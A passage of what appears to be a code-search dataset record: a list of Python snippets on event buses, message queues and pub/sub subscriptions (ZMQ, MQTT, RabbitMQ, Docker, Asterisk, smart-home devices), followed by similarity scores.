co_listen_for_events())\n assert received_kwargs == [{'field': 'Hello! 
😎'}]\n assert received_api_name == 'my.dummy'\n assert received_event_name == 'my_event'", "def _run(self):\n print \"ZMQSubscriber: loop started\"\n port = \"5556\"\n context = zmq.Context()\n socket = context.socket(zmq.SUB)\n socket.connect(\"tcp://localhost:%s\" % port)\n # socket.setsockopt_string(zmq.SUBSCRIBE, u'') # get everything\n socket.setsockopt_string(zmq.SUBSCRIBE, u'[firewall]')\n socket.setsockopt_string(zmq.SUBSCRIBE, u'END')\n\n while self._do_work.is_set():\n try:\n data = socket.recv_string()\n # print \"Got data:\", repr(data)\n print data\n if data == 'END':\n self.stop()\n except Queue.Empty:\n pass\n\n print \"ZMQSubscriber: loop stopped\"", "def connect(self):\n\t\tself.printed_sub = False\n\t\tself.client.connect(BROKER)\n\t\tself.client.loop_forever()", "def _subscribe(self, signal, reconnect=False):\n if reconnect:\n if signal not in self._downstream_reconnect:\n self._downstream_reconnect.append(signal)\n else:\n if signal not in self._downstream:\n self._downstream.append(signal)", "def subscribe_topic(self):\n req = {\n \"op\": \"subscribe\",\n \"args\": [\n \"instrument\",\n \"trade\",\n \"orderBook10\",\n \"execution\",\n \"order\",\n \"position\",\n \"margin\",\n ],\n }\n self.send_packet(req)", "def handle_client(self):\n e = threading.Event()\n reg_t = threading.Thread(target=self.handle_reg_client, args=(e,))\n stream_t = threading.Thread(target=self.handle_stream_client,\n args=(e,))\n reg_t.start()\n stream_t.start()", "def startComponent (self):\n \n logging.info ('\\n\\nStarting AlertHandler Component...')\n\n #// Message service object for this component\n self.ms = MessageService()\n \n #// Register this component to MessageService\n self.ms.registerAs('AlertHandler')\n \n logging.debug ('Assiging important object references to all the alert handlers registered in PRODCOMMON')\n \n for handler in GlobalRegistry.registries['AlertHandler'].keys():\n \n handlerRef = GlobalRegistry.registries['AlertHandler'][handler]\n handlerRef.ms = self.ms\n handlerRef.args = self.args\n \n \n #//Subscribing to all defined Alert Events \n for event in self.args['AlertEvent'].keys():\n\n self.ms.subscribeTo (event) \n logging.info('Subscribed to %s event' % event)\n \n #// Subscribing to Debug log control event \n self.ms.subscribeTo('AlertHandler:StartDebug')\n self.ms.subscribeTo('AlertHandler:EndDebug')\n self.ms.commit() \n self.ms.publish('AlertHandler:StartDebug','') \n self.ms.commit()\n\n logging.debug('Subscribed to StartDebug & EndDebug events')\n logging.info ('AlertHandler Component started Successfully')\n\n \n\n #// Start Listning to message service events\n while True: \n \n Session.set_database(dbconfig)\n Session.connect()\n Session.start_transaction()\n type, payload = self.ms.get()\n\n\n #//passing Event payload to event responsive function \n self.__call__ (type, payload) \n\n #//Committing transaction and start listning to published events again \n Session.commit_all()\n Session.close_all()\n self.ms.commit() \n \n return", "def main(event, context):\n\n logger.info(f\"Event data is: {event}\")\n try:\n # Incoming event is already byte encoded\n client.append_message(stream_name=\"LocalDataStream\", data=event)\n except Exception as e:\n logger.error(f\"Error appending: {e}\")\n return", "def subscribe(self, event_type: typing.Type[typing.Any], callback: CallbackT[typing.Any]) -> None:", "def ReceiveStreamedEvents(self, request, context):\n print 'got ReceiveStreamedEvents request'\n while 1:\n if ShutDown.stop:\n break\n yield 
self.get_next_event()", "async def on_start(objs, event):\n channel = objs['channel']\n await channel.answer()\n playback = await channel.play(media='sound:demo-congrats')\n\n async def on_dtmf(channel, event):\n \"\"\"Callback for DTMF events.\n\n DTMF events control the playback operation.\n\n :param channel: Channel DTMF was received on.\n :param event: Event.\n \"\"\"\n # Since the callback was registered to a specific channel, we can\n # control the playback object we already have in scope.\n # TODO: if paused: unpause before doing anything else\n digit = event['digit']\n if digit == '5':\n await playback.control(operation='pause')\n elif digit == '8':\n await playback.control(operation='unpause')\n elif digit == '4':\n await playback.control(operation='reverse')\n elif digit == '6':\n await playback.control(operation='forward')\n elif digit == '2':\n await playback.control(operation='restart')\n elif digit == '#':\n await playback.stop()\n await channel.continueInDialplan()\n else:\n print >> sys.stderr, \"Unknown DTMF %s\" % digit\n\n channel.on_event('ChannelDtmfReceived', on_dtmf)", "def on_message(self, msg) -> None:\n\n decoded_msg = json.loads(msg)\n message_type = decoded_msg[\"type\"]\n\n if message_type == MSG_SUBCRIPTIONS:\n\n product_ids = decoded_msg[\"channels\"]\n logging.debug(\"Subscriptions: {}\".format(product_ids))\n\n elif message_type == MSG_SNAPSHOT:\n\n product_id = decoded_msg[\"product_id\"]\n self._snapshot(decoded_msg)\n\n # Old best bid and ask doesn't exist yet, this will always set a new bbo\n self.set_if_new_bbo(product_id)\n\n elif message_type == MSG_L2UPDATE:\n\n product_id = decoded_msg[\"product_id\"]\n self.update(decoded_msg)\n\n self.set_if_new_bbo(product_id)\n\n self.event_count += 1", "def start_publishing(self):\n print(f\"{self._connection_param}: Issuing consumer related RPC commands\")\n # self._channel.confirm_delivery(self.on_delivery_confirmation)\n self.schedule_next_message(self.SLOW_SEND)", "def subscribe( self, topic ):\n logging.info( \"Subscribing to topic %s\" %topic )\n try:\n self.client.subscribe( topic )\n except Exception as error:\n print( error )", "def consume(docker_client, redis_client):\n print 'Start consuming events from %s' % docker_client.base_url\n since = redis_client.get('castor:last_event')\n for event in docker_client.events(decode=True, since=since):\n for hook in settings.HOOKS:\n tasks.dispatch_event.delay(event, hook)\n redis_client.set('castor:last_event', event['time'])", "def subscribe(self, lambda_arn):\n try:\n subscription = self.topic.subscribe(\n Protocol = 'lambda',\n Endpoint = lambda_arn\n )\n except Exception as e:\n print (e)\n raise", "def receive(channel):\n\n def callback(ch, method, properties, body):\n\n event = json.loads(body)\n event_info = event['event_info']\n event_type = event['type']\n success = True\n logger.info(f\"Received event {event}\")\n\n try:\n # Events coming from account microservice\n\n if event_type == USER_CREATED_EVENT:\n\n add_and_publish_event(\n GlobalPreferencesCreatedEvent(event['uuid'], event_info['id'], dict(\n vehicles=['bus', 'subway', 'train', 'tram', 'car', 'walking', 'bike', 'taxi',\n 'enjoy', 'mobike'],\n personal_vehicles=[])),\n PREFERENCES_CREATED)\n\n elif event_type == USER_DELETED_EVENT:\n\n add_and_publish_event(GlobalPreferencesDeletedEvent(event['uuid'], event_info['id']), PREFERENCES_DELETED)\n\n # Events generated in this microservice\n\n elif event_type == PREFERENCES_CREATED_EVENT:\n 
add_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_MODIFIED_EVENT:\n modify_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == PREFERENCES_DELETED_EVENT:\n delete_global_preferences(GlobalPreferences(**event_info))\n\n elif event_type == CALENDAR_CREATED_EVENT:\n add_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_MODIFIED_EVENT:\n modify_calendar(Calendar(**event_info))\n\n elif event_type == CALENDAR_DELETED_EVENT:\n delete_calendar(Calendar(**event_info))\n\n except SQLAlchemyError as e:\n\n # to deal with at least once delivery of rabbitmq and the create methods which are not idempotent\n if (event_type == USER_CREATED_EVENT or event_type == PREFERENCES_CREATED_EVENT or event_type == CALENDAR_CREATED_EVENT) \\\n and method.redelivered and isinstance(e, IntegrityError):\n logger.info(f'Not processed redelivered event {event}')\n\n else:\n logger.info(f\"Couldn't process event {event}\")\n success = False\n\n finally:\n if success: # ack only if the event has been processed\n ch.basic_ack(delivery_tag=method.delivery_tag)\n logger.info(f\"Processed and acked event {event}\")\n\n # channel.basic_qos(prefetch_count=1)\n channel.basic_consume(callback,\n queue=CALENDAR_QUEUE)\n\n logger.info(\"Started listening to events\")\n channel.start_consuming()", "def on_message(self, event):\n self.response = event.message\n self.connection.container.yield_() # Wake up the wait() loop to handle the message.", "def on_connect(client, userdata, flags, rcdata):\n client.subscribe(\"diy/system/fire\", 1)\n client.subscribe(\"diy/system/panic\", 1)\n client.subscribe(\"diy/system/who\", 1)", "async def acknowledge(self, *event_messages, bus_client: \"BusClient\"):\n pass" ]
[ "0.65859115", "0.65859115", "0.65859115", "0.6490624", "0.63868344", "0.6325292", "0.6266391", "0.62001973", "0.6125916", "0.60468745", "0.6021934", "0.6003453", "0.59971917", "0.5954995", "0.59471166", "0.59357494", "0.5932107", "0.59087026", "0.58901316", "0.5858419", "0.58411354", "0.58189034", "0.58146566", "0.5793195", "0.57912093", "0.5777", "0.5774395", "0.57714057", "0.57520145", "0.5729525", "0.57272995", "0.57149214", "0.5700734", "0.569956", "0.5699161", "0.5694384", "0.56906617", "0.56847346", "0.5681406", "0.5673299", "0.5651948", "0.56400794", "0.561818", "0.55963093", "0.5583364", "0.5574008", "0.5566383", "0.55613583", "0.5550341", "0.553477", "0.5526386", "0.55260664", "0.55206263", "0.5488943", "0.548662", "0.54863584", "0.54745233", "0.5474225", "0.54737234", "0.5473616", "0.547278", "0.54653853", "0.5460389", "0.5457525", "0.5451493", "0.5449082", "0.5443095", "0.5437704", "0.54269326", "0.542407", "0.5423601", "0.5412311", "0.54091305", "0.5407725", "0.5402802", "0.5402802", "0.53906786", "0.5378752", "0.53726184", "0.53657883", "0.53632945", "0.53622526", "0.53539544", "0.534763", "0.5346781", "0.5346701", "0.5342332", "0.5336471", "0.53328043", "0.53301954", "0.531806", "0.5308178", "0.53055096", "0.5304112", "0.5294951", "0.5293482", "0.5292844", "0.5285168", "0.52851015", "0.5280709", "0.5279637" ]
0.0
-1
Callback that gets called for any event on the EDR event bus
def on_bus_message(self, channel, method_frame, header_frame, body):
        try:
            # there are two messages that get broadcast that we really
            # don't care about.  They have to do with feed synchronization
            # and other internal book-keeping

            if method_frame.routing_key in self.capture_events:
                event = {
                    "content_type": header_frame.content_type,
                    "routing_key": method_frame.routing_key,
                    "body": body
                }

                self.logger.debug("Received Message: %s - %s" % (header_frame.content_type, method_frame.routing_key))
                self.processor_pool.apply_async(process_event, (self.event_processor, event))
            else:
                self.logger.debug("Unknown message info: %s" % method_frame.routing_key)
        except:
            self.logger.exception("Error processing bus message")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def event_in_cb(self, msg):\n self.event = msg.data", "def process_event(self, event):\r\n pass", "def visit_event(self, event):", "def handleEvents(self, events):\n pass", "def on_event(self, event):\n pass", "def on_event(self, event):\r\n pass", "def event_receive(self,event):\n\n pass", "def on_event(self, event):\r\n\r\n print(\"on event called, event:\", event)\r\n\r\n self.state = self.state.on_event(event)\r\n publish_state_msg(state_msg, odrive_bridge.get_state())", "def on_event_finished(self, event):", "def _handle_event(event):\n if event.device.id_string != self._event.device.id_string:\n return\n\n self.apply_event(event)", "def handleEvent(self, event):\n pass", "def onEvent(self, eventName, callBack):\n self.msg_namespace.on('ops', callBack)", "def runEventCallbacks(self, event, *args):\n\n if not event in self.EVENT_TYPES:\n raise Exception(\"XnatIo (onEvent): invalid event type '%s'\"%(\\\n event))\n if not hasattr(self, 'eventCallbacks__'):\n print('self has no attribute eventCallbacks__')\n return\n\n for callback in self.eventCallbacks__[event]:\n #print(f\"EVENT CALLBACK {event}\")\n callback(*args)", "def events(self):", "def on_event(self, event):", "def handle_event(self, event):\n pass", "def eventInCallback(self, msg):\n rospy.loginfo(\"event_in msg received\")\n self.event_in = msg.data", "def event_queue_proc(self,event):\r\n event()", "def event_handler(self, response):\n pass", "def eventReceived(self, event):\n print repr(event)", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def listener(self, event):\n print \"TB:@%s arrived event %s\" % (event.time, event) \n informFunction = self._informFunc\n informFunction((event.time, event.state))\n return []", "def async_event_handler(self, event: dict) -> None:\n if event['e'] == 'added':\n\n if event['r'] == 'lights' and event['id'] not in self.lights:\n device_type = 'light'\n device = self.lights[event['id']] = DeconzLight(\n event['id'], event['light'], self.async_put_state)\n\n elif event['r'] == 'sensors' and event['id'] not in self.sensors:\n if supported_sensor(event['sensor']):\n device_type = 'sensor'\n device = self.sensors[event['id']] = create_sensor(\n event['id'], event['sensor'], self.async_put_state)\n else:\n _LOGGER.warning('Unsupported sensor %s', event)\n return\n\n else:\n _LOGGER.debug('Unsupported event %s', event)\n return\n\n if self.async_add_device_callback:\n self.async_add_device_callback(device_type, device)\n\n elif event['e'] == 'changed':\n\n if event['r'] == 'groups' and event['id'] in self.groups:\n self.groups[event['id']].async_update(event)\n\n elif event['r'] == 'lights' and event['id'] in self.lights:\n self.lights[event['id']].async_update(event)\n self.update_group_color([event['id']])\n\n elif event['r'] == 'sensors' and event['id'] in self.sensors:\n self.sensors[event['id']].async_update(event)\n\n else:\n _LOGGER.debug('Unsupported event %s', event)\n\n elif event['e'] == 'deleted':\n _LOGGER.debug('Removed event %s', event)\n\n else:\n _LOGGER.debug('Unsupported event %s', event)", "def __call__(self, event):\n if not self.events or event in self.events:\n super(EventHandler, self).__call__(event)", "def _emited(self, *args):\n\t\tdebug(\"OnEventDeferred : event catched\")\n\t\tself.callback(*args)\n\t\tself._clean()", "def register_to_event(request):\n pass", "def handle_event(self, event):", "def on_event(self, events):\n raise NotImplemented(\"on_event method should be implemented.\")", "def process(self, event):\n pass", "def on(self, 
event_name, callback):\n self.factory.on(event_name, callback)", "def subscribe(self, event_handler):\n pass # pragma: no cover", "def consume_event(self, ev: dict):\n print(\"error: model has no consume_event implementation\")\n exit(1)", "def __empty_event_handler(self, govee, device, raw_data):\n\n pass", "def _callEventGetAll(self, callback_id, event_name):\n return self._event_client.eventGetAll(callback_id, event_name)", "def handler(event, context):\n if event['Records'][0]['Sns']['Message'] is None:\n _print_info('Unrecognized event, function will not be executed. Enable debug to log the actual event.')\n _print_debug('event: {}'.format(event))\n return\n\n message = event['Records'][0]['Sns']['Message']\n _print_debug('message received: {}'.format(message))\n\n event = json.loads(message)\n _print_info('event: {}'.format(json.dumps(event)))\n\n if event[ACTION] in ALLOWED_ACTIONS:\n\n _print_info('Requested action: {}'.format(event[ACTION]))\n\n _print_info('Initializing.')\n _init_vars_()\n\n # create a hive cursor which can be passed around and then closed when done.\n cursor = _create_hive_cursor()\n\n if event[ACTION] == FULL_SYNC:\n _sync_all(cursor)\n if event[ACTION] == DELTA_SYNC:\n if event[USER] and event[NAMESPACE]:\n _sync_delta(cursor, event[USER], event[NAMESPACE])\n else:\n _print_error(\n 'Invalid request. Expecting both: a valid \\'{}\\' and a valid \\'{}\\''.format(\n USER, NAMESPACE))\n\n # close the hive cursor when done\n _close_hive_cursor(cursor)\n else:\n _print_error(\n 'Unknown action. Expecting one of: \\'{}\\', \\'{}\\''.format(FULL_SYNC,\n DELTA_SYNC))", "def address_mapped_event(self, event):\r\n pass", "def doEvent(self, source):\n pass", "def _add_event_callback(self):\n for gpio_channel in self.registered_gpio:\n self.gpio_add_event_callback(gpio_channel)", "def process_amqp_events(self):\n self.connection.process_data_events()", "def reg_event_handler(self, callback_func, userData):\n\t\tcall_sdk_function('PrlSrv_RegEventHandler', self.handle, callback_func, userData)", "async def events(self) -> Iterable[Event]:", "async def handle_andesite_event(self, event: andesite.AndesiteEvent) -> None:\n ...", "def route(self, evtlist):\n for callback in reversed(evtlist):\n if not self.consumed:\n try:\n callback(self)\n except BaseException:\n traceback.print_exc()\n raise", "def test_dispatch_event(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [])\n msg = msg_helper.make_ack()\n yield worker_helper.dispatch_event(msg, 'fooconn')\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [msg])", "def msg_event(self, event):\r\n pass", "def run(self, event):\n pass", "async def listen_event(\n self, callback: Callable, event: Union[str, list] = None, **kwargs: Optional[Any]\n ) -> Union[str, list]:\n namespace = self._get_namespace(**kwargs)\n\n if \"namespace\" in kwargs:\n del kwargs[\"namespace\"]\n\n _name = self.name\n self.logger.debug(\"Calling listen_event for %s\", self.name)\n\n if isinstance(event, list):\n handles = []\n for e in event:\n handle = await self.AD.events.add_event_callback(_name, namespace, callback, e, **kwargs)\n handles.append(handle)\n\n return handles\n\n else:\n return await self.AD.events.add_event_callback(_name, namespace, callback, event, **kwargs)", "def ev_controllerdeviceremoved(self, event: tcod.event.ControllerDevice) -> T | None:", "def event_handler(self, event: dict) -> 
None:\n if (event_type := event[\"e\"]) not in (EVENT_ADDED, EVENT_CHANGED):\n LOGGER.debug(\"Unsupported event %s\", event)\n return\n\n if (resource_type := event[\"r\"]) not in (\n GROUP_RESOURCE,\n LIGHT_RESOURCE,\n SENSOR_RESOURCE,\n ):\n LOGGER.debug(\"Unsupported resource %s\", event)\n return\n\n device_class = getattr(self, resource_type)\n device_id = event[\"id\"]\n\n if event_type == EVENT_CHANGED and device_id in device_class:\n device_class.process_raw({device_id: event})\n if resource_type == LIGHT_RESOURCE and \"attr\" not in event:\n self.update_group_color([device_id])\n return\n\n if event_type == EVENT_ADDED and device_id not in device_class:\n device_class.process_raw({device_id: event[resource_type[:-1]]})\n device = device_class[device_id]\n if self.async_add_device_callback:\n self.async_add_device_callback(resource_type, device)\n return", "def onEvent(self, eventKey, callback):\n\n #-------------------- \n # Construct callback dict if it doesn't exist.\n #--------------------\n if not hasattr(self, 'eventCallbacks__'):\n self.eventCallbacks__ = {}\n for eventType in self.EVENT_TYPES:\n self.eventCallbacks__[str(eventType)] = []\n\n\n if not eventKey in self.EVENT_TYPES:\n raise Exception(\"Xnat.io (onEvent): invalid event type '%s'\"%(eventKey))\n self.eventCallbacks__[eventKey].append(callback)", "def handle_event(event, context):\n print(\"Executing...\")\n router = Router(ROUTE_MAP)\n return router.route_request(event, context)", "def onNewEvent(self, event):\n self._logger.debug('Received event: %s' % event)", "def callevent_handler(data):\n return CallEventHandler(data)", "def callback(self, event):\n button = event[\"button\"]\n\n cmd = self._callbacks.get(self._uuidstr(self.global_id, button), None)\n cmd = self._callbacks.get(self._uuidstr(event[\"name\"], button), cmd)\n cmd = self._callbacks.get(self._uuidstr(event[\"instance\"], button), cmd)\n\n if cmd is None:\n return\n if callable(cmd):\n cmd(event)\n else:\n bumblebee.util.execute(cmd, False)", "def buildEvent(data):", "def on_eot(self, data):\n logger.debug('on_eot: %r', data)\n if self.in_transfer_state:\n # put the records together to a message\n if self.messages:\n message = b\"\".join(self.messages)\n self.queue.put_nowait(message)\n self.discard_env()\n else:\n raise InvalidState('Server is not ready to accept EOT message.')", "async def server_event_trigger(self, event):\n event_data = event[\"event_data\"]\n await self.send_json(event_data)", "def dispatchEvent(self, event):\n # See if any callbacks have been registered for this event type:\n if event.event_type in self.callbacks:\n # Yes, at least one has been registered. Call them in order:\n for callback in self.callbacks[event.event_type]:\n # Call the function with the event as an argument:\n callback(event)", "def _dispatch_event(self, event: Event) -> bool:\n\n if event.type == EventType.episode_start.value and event.episode_start:\n self.episode_start(event.episode_start.config)\n\n elif event.type == EventType.episode_step.value and event.episode_step:\n self.episode_step(event.episode_step.action)\n\n elif event.type == EventType.episode_finish.value and event.episode_finish:\n self.episode_finish(event.episode_finish.reason)\n\n elif event.type == EventType.idle.value and event.idle:\n try:\n self.idle(event.idle.callback_time)\n except AttributeError:\n # callbacktime is always 0. 
Sometimes the attribute is missing.\n # Idle for 0 seconds if attribute is missing.\n self.idle(0)\n\n elif event.type == EventType.unregister.value and event.unregister:\n log.info(\"Unregister reason: {}.\".format(event.unregister.reason))\n return False\n\n return True", "def get_api_event(self):\n pass", "def __call__ (self, event, payload):\n\n logging.info ('\\n\\nReceived Event: '+ str(event) + '\\nPayload: ' + str(payload))\n\n try:\n\n if event == 'AlertHandler:StartDebug':\n logging.getLogger().setLevel(logging.DEBUG)\n logging.info ('Logging level changed to DEBUG Mode')\n\n elif event == 'AlertHandler:EndDebug':\n logging.getLogger().setLevel(logging.INFO)\n logging.info ('Logging level changed to INFO Mode')\n \n elif event in self.args['AlertEvent'].keys():\n handler = retrieveHandler(self.args['AlertEvent'][event],'AlertHandler')\n handler(payload)\n\n except Exception, ex: \n \n logging.error('Exception Caught while handling the event: ' + str(event) + ' payload: ' + str(payload) ) \n logging.error(str(ex))\n\n return", "def unknown_event(self, event):\r\n pass", "def on_any_event(self, event):\n\n def handle_event():\n if self.clear_module_cache:\n self.clear_module_cache()\n\n event_dict = _event_to_dict(event)\n self.log.debug('event: %s', event_dict)\n\n @gen.coroutine\n def execute_callbacks():\n for code in self.code_blocks:\n try:\n yield self.execute_code(code, event=event_dict)\n except Exception as e:\n self.log.exception('Code execution error: %s', e)\n\n for job in self.jobs:\n try:\n yield self.execute_job(job)\n except Exception as e:\n self.log.exception('Job execution error: %s', e)\n\n if self.debounce > 0.0:\n if self._timeout:\n self.ioloop.remove_timeout(self._timeout)\n self._timeout = self.ioloop.call_later(self.debounce, execute_callbacks)\n else:\n if self.throttle > 0.0:\n if self._in_throttle:\n return\n\n def unthrottle():\n self._in_throttle = False\n\n self._in_throttle = True\n self._timeout = self.ioloop.call_later(self.throttle, unthrottle)\n\n self.ioloop.add_callback(execute_callbacks)\n\n self.ioloop.add_callback(handle_event)", "def _process_event(self, event: Dict[str, Any]) -> None:\n try:\n content = event[\"content\"]\n _LOGGER.debug(\"Received event: %s\", content)\n except KeyError:\n _LOGGER.warning(\"Received invalid event: %s\", event)\n return\n\n if content[\"deviceId\"] is not None:\n device_id = content[\"deviceId\"]\n self._update_device_attr(\n device_id, content[\"name\"], content[\"value\"], content[\"unit\"]\n )\n\n evt = Event(content)\n\n if device_id in self._listeners:\n for listener in self._listeners[device_id]:\n listener(evt)\n elif content[\"name\"] == \"mode\":\n name = content[\"value\"]\n mode_set = False\n for mode in self._modes:\n if mode.name == name:\n mode.active = True\n mode_set = True\n else:\n mode.active = False\n\n # If the mode wasn't set, this is a new mode. Add a placeholder\n # to the modes list, and reload the modes\n if not mode_set:\n self._modes.append(Mode({\"active\": True, \"name\": name}))\n _ = self._load_modes()\n\n evt = Event(content)\n\n for listener in self._listeners.get(ID_MODE, []):\n listener(evt)\n\n elif content[\"name\"] == \"hsmStatus\":\n self._hsm_status = content[\"value\"]\n evt = Event(content)\n for listener in self._listeners.get(ID_HSM_STATUS, []):\n listener(evt)", "def handle_event(self, ev):\n msg = (\"Handling event '%s' \" % (ev.id))\n LOG.info(msg)\n try:\n msg = (\"Worker process with ID: %s starting \"\n \"to handle task: %s of topic: %s. 
\"\n % (os.getpid(), ev.id, lb_const.LBAAS_AGENT_RPC_TOPIC))\n LOG.debug(msg)\n\n method = getattr(self, \"_%s\" % (ev.id.lower()))\n method(ev)\n except Exception as err:\n msg = (\"Failed to perform the operation: %s. %s\"\n % (ev.id, str(err).capitalize()))\n LOG.error(msg)\n finally:\n if ev.id == lb_const.EVENT_COLLECT_STATS_V2:\n \"\"\"Do not say event done for collect stats as it is\n to be executed forever\n \"\"\"\n pass\n else:\n msg = (\"Calling event done for event '%s' \" % (ev.id))\n LOG.info(msg)\n self.sc.event_complete(ev)", "def invoke(self, event_args, *args, **kwargs):\n pass # pragma: no cover", "def dispatch(self, sender, event, *args, **kwargs):\n pass # pragma: no cover", "def process_event(event):\n\n # Extract the required parameters from the request body\n id = event.get('id')\n token = event.get('token')\n type = event.get('type')\n\n # If any of the required parameters are absent, reject the request.\n if (not id) or (not token) or (not type):\n app.logger.warn('Request rejected: Required field absent')\n abort(400)\n\n # Message type must be on the allowed types\n legal_types = ['STARTUP', 'DISPENSE', 'REFILL', 'REFILLED', 'EMPTY']\n if type not in legal_types:\n app.logger.warn('Request rejected: Invalid event type')\n abort(400)\n\n # Authenticate the dispenser against our database of tokens.\n if not permitted(event['id'], event['token']):\n app.logger.warn('Request rejected: Invalid authentication token')\n abort(401)\n\n # Dispatch event to appropriate handler\n if type == 'STARTUP':\n handle_startup(event)\n elif type == 'DISPENSE':\n handle_dispense(event)\n elif type == 'REFILL':\n handle_refill_request(event)\n elif type == 'REFILLED':\n handle_refilled(event)\n elif type == 'EMPTY':\n handle_empty(event)\n\n # Send the event to the dispensers Kafka topic\n # TODO Topic for startup, dispense, battery level, refill request\n # producer.send(type, event)", "def default_event_handler(event):\n pass", "def lambda_handler(event, context):\n return dispatch(event)", "def register_standard(self, event_name, callback):\n \n raise NotImplementedError()", "def terncy_event_handler(tern, ev):\n hass = tern.hass_platform_data.hass\n parsed_devices = tern.hass_platform_data.parsed_devices\n if isinstance(ev, terncy.event.Connected):\n _LOGGER.info(\"got connected event %s\", tern.dev_id)\n asyncio.ensure_future(async_refresh_devices(hass, tern))\n if isinstance(ev, terncy.event.Disconnected):\n _LOGGER.info(\"got disconnected event %s\", tern.dev_id)\n for dev in parsed_devices.values():\n dev.is_available = False\n dev.schedule_update_ha_state()\n if isinstance(ev, terncy.event.EventMessage):\n _LOGGER.info(\"got event message %s %s\", tern.dev_id, ev.msg)\n evt_type = \"\"\n if \"type\" in ev.msg:\n evt_type = ev.msg[\"type\"]\n if \"entities\" not in ev.msg:\n return\n ents = ev.msg[\"entities\"]\n if evt_type == \"report\":\n for ent in ents:\n if \"attributes\" not in ent:\n continue\n devid = ent[\"id\"]\n temperature = get_attr_value(ent[\"attributes\"], \"temperature\")\n if temperature is not None:\n _LOGGER.info(\"got temperature\")\n devid = devid + DEVID_EXT_TEMP\n\n if devid in parsed_devices:\n dev = parsed_devices[devid]\n attrs = ent[\"attributes\"]\n dev.update_state(attrs)\n dev.schedule_update_ha_state()\n else:\n _LOGGER.info(\"dev %s not found\", devid)\n\n elif evt_type == \"keyPressed\":\n for ent in ents:\n if \"attributes\" not in ent:\n continue\n devid = ent[\"id\"]\n\n if devid in parsed_devices:\n dev = parsed_devices[devid]\n attrs = 
ent[\"attributes\"]\n times = attrs[0][\"times\"]\n ev_type = ACTION_SINGLE_PRESS\n if times == 2:\n ev_type = ACTION_DOUBLE_PRESS\n event_data = {\n EVENT_DATA_CLICK_TIMES: times,\n \"source\": devid,\n }\n _LOGGER.info(\"fire event to bus %s %d\", ev_type, times)\n _LOGGER.info(event_data)\n hass.bus.fire(\n ev_type,\n event_data,\n )\n elif evt_type == \"entityAvailable\":\n for ent in ents:\n devid = ent[\"id\"]\n _LOGGER.info(\"[%s] %s is available\", tern.dev_id, devid)\n hass.async_create_task(update_or_create_entity(ent, tern))\n elif evt_type == \"offline\":\n for ent in ents:\n devid = ent[\"id\"]\n _LOGGER.info(\"[%s] %s is offline\", tern.dev_id, devid)\n if devid in parsed_devices:\n dev = parsed_devices[devid]\n dev.is_available = False\n dev.schedule_update_ha_state()\n elif devid.rfind(\"-\") > 0:\n prefix = devid[0 : devid.rfind(\"-\")]\n _LOGGER.info(\n \"[%s] %s not found, try find prefix\", tern.dev_id, prefix\n )\n devs = find_dev_by_prefix(parsed_devices, prefix)\n for dev in devs:\n _LOGGER.info(\"[%s] %s is offline\", tern.dev_id, dev.unique_id)\n dev.is_available = False\n dev.schedule_update_ha_state()\n elif evt_type == \"entityDeleted\":\n platform = None\n for plat in async_get_platforms(hass, DOMAIN):\n if plat.config_entry.unique_id == tern.dev_id:\n platform = plat\n break\n if platform is None:\n return\n for ent in ents:\n devid = ent[\"id\"]\n _LOGGER.info(\"[%s] %s is deleted\", tern.dev_id, devid)\n if devid in parsed_devices:\n dev = parsed_devices[devid]\n dev.is_available = False\n dev.schedule_update_ha_state()\n elif devid.rfind(\"-\") > 0:\n prefix = devid[0 : devid.rfind(\"-\")]\n _LOGGER.info(\n \"[%s] %s not found, try find prefix\", tern.dev_id, prefix\n )\n devs = find_dev_by_prefix(parsed_devices, prefix)\n for dev in devs:\n _LOGGER.info(\"[%s] %s is delete\", tern.dev_id, dev.unique_id)\n hass.async_create_task(\n platform.async_remove_entity(dev.entity_id)\n )\n parsed_devices.pop(dev.unique_id)\n else:\n _LOGGER.info(\"unsupported event type %s\", evt_type)", "def callback(self):\n pass # pragma: no cover", "def callback(e, **kw):\n results.append(kw)\n if e.meta.get('multi') is not True:\n context.detach_events(e)\n events_.remove(e)\n if e.meta.get('final') is True:\n # end on success\n end(False)", "def react_to_event(self):\n raise NotImplementedError()", "def init_events_transmitter():\n class StatusListener(SubscribeCallback):\n def status(self, pubnub, status):\n event = \"unknown\"\n\n if status.operation == PNOperationType.PNSubscribeOperation \\\n and status.category == PNStatusCategory.PNConnectedCategory:\n event = \"Connect\"\n elif status.operation == PNOperationType.PNUnsubscribeOperation \\\n and status.category == PNStatusCategory.PNAcknowledgmentCategory:\n event = \"Unsubscribe\"\n\n asyncio.ensure_future(pubnub.publish().channel('status-' + APP_KEY).message({\n \"event\": event\n }).future(), loop=loop)\n\n def presence(self, pubnub, presence):\n pass\n\n def message(self, pubnub, message):\n pass\n\n listener = StatusListener()\n pubnub.add_listener(listener)", "def events_and_callbacks_qi_framework():\n\n # ALMemory acts as the hub for the distribution of event notifications.\n # Source: https://developer.softbankrobotics.com/nao6/naoqi-developer-guide/naoqi-apis/naoqi-core/almemory\n # Example: https://developer.softbankrobotics.com/nao6/naoqi-developer-guide/other-tutorials/python-sdk-tutorials/python-sdk-examples/vision/face\n\n # Create a broker\n # TODO(TK): why?\n naoqi.ALBroker(\"pythonBroker\", IP_ME, 
